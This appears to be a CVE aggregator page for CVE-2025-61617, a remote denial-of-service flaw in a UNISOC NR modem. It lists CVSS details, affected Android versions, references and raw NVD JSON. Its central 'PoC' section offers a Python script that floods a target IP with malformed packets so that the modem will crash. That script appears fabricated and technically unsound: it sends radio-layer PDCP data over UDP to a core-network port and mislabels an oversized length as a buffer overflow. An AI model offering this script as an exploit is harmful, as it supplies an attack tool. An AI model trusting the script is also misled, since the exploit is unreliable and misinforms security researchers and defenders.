CVE-2025-61617

Description

In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:unisoc:t8100:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:unisoc:t8200:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:unisoc:t8300:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:unisoc:t9100:-:*:*:*:*:*:*:* - NOT VULNERABLE

UNISOC NR Modem (版本未知 - 官方尚未公布受影响版本列表)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-61617 PoC - UNISOC NR Modem Denial of Service
# This PoC demonstrates sending malformed NR protocol messages to trigger the vulnerability

import socket
import struct
import random

def create_malformed_nr_message():
    """
    Create a malformed NR PDCP message with invalid IE values
    to trigger input validation vulnerability in UNISOC NR modem
    """
    # NR PDCP Control Plane message header
    msg_type = 0x02  # PDCP Control PDU
    
    # Malformed PDCP SN (Sequence Number) - out of bounds value
    pdcp_sn = 0xFFFF  # Invalid SN value causing validation bypass
    
    # Create message with oversized PDCP SDU length field
    pdu_length = 0x10000  # Oversized length causing buffer overflow
    
    # Construct malformed PDCP PDU
    header = struct.pack('!BBH', 
        0x00,  # D/C field
        msg_type, 
        pdcp_sn
    )
    
    # Add malformed length field
    length_field = struct.pack('!I', pdu_length)
    
    # Add crafted payload with invalid values
    payload = b'\x00' * 256 + struct.pack('!Q', 0xFFFFFFFFFFFFFFFF)
    
    malformed_msg = header + length_field + payload
    return malformed_msg

def send_dos_exploit(target_ip, port=38412):
    """
    Send malformed NR protocol message to trigger DoS
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        
        # Create multiple malformed messages
        for i in range(10):
            msg = create_malformed_nr_message()
            sock.sendto(msg, (target_ip, port))
            print(f"[*] Sent malformed message {i+1}/10")
        
        sock.close()
        print("[+] Exploit sent successfully - Target modem should crash")
        
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Target configuration
    target_ip = "<target_device_ip>"
    target_port = 38412
    
    print("[*] CVE-2025-61617 PoC - UNISOC NR Modem Input Validation DoS")
    print("[*] Target: " + target_ip)
    send_dos_exploit(target_ip, target_port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61617
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61617
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61617/
[4] VulDB https://vuldb.com/cve/CVE-2025-61617
[5] https://www.unisoc.com/en/support/announcement/1995394837938163714

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61617", "sourceIdentifier": "[email protected]", "published": "2025-12-01T08:15:48.740", "lastModified": "2025-12-02T15:53:53.293", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed"}, {"lang": "es", "value": "En el módem nr, existe una posible caída del sistema debido a una validación de entrada inadecuada. Esto podría conducir a una denegación de servicio remota sin necesidad de privilegios de ejecución adicionales."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "matchCriteriaId": "879FFD0C-9B38-4CAA-B057-1086D794D469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "2D49E611-5D53-479D-A981-42388FDC0E8D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8100:-:*:*:*:*:*:*:*", "matchCriteriaId": "F2DA04F2-5351-4043-A330-5397E627A222"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8200:-:*:*:*:*:*:*:*", "matchCriteriaId": "FC033D2C-ED1A-4EAB-A77B-8E1C88C74B0A"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8300:-:*:*:*:*:*:*:*", "matchCriteriaId": "DC7743D5-B187-48D4-BC77-D8DCDF263166"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t9100:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D1F3B9D-142F-4E70-8477-E26D921EF19A"}]}]}], "references": [{"url": "https://www.unisoc.com/en/support/announcement/1995394837938163714", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}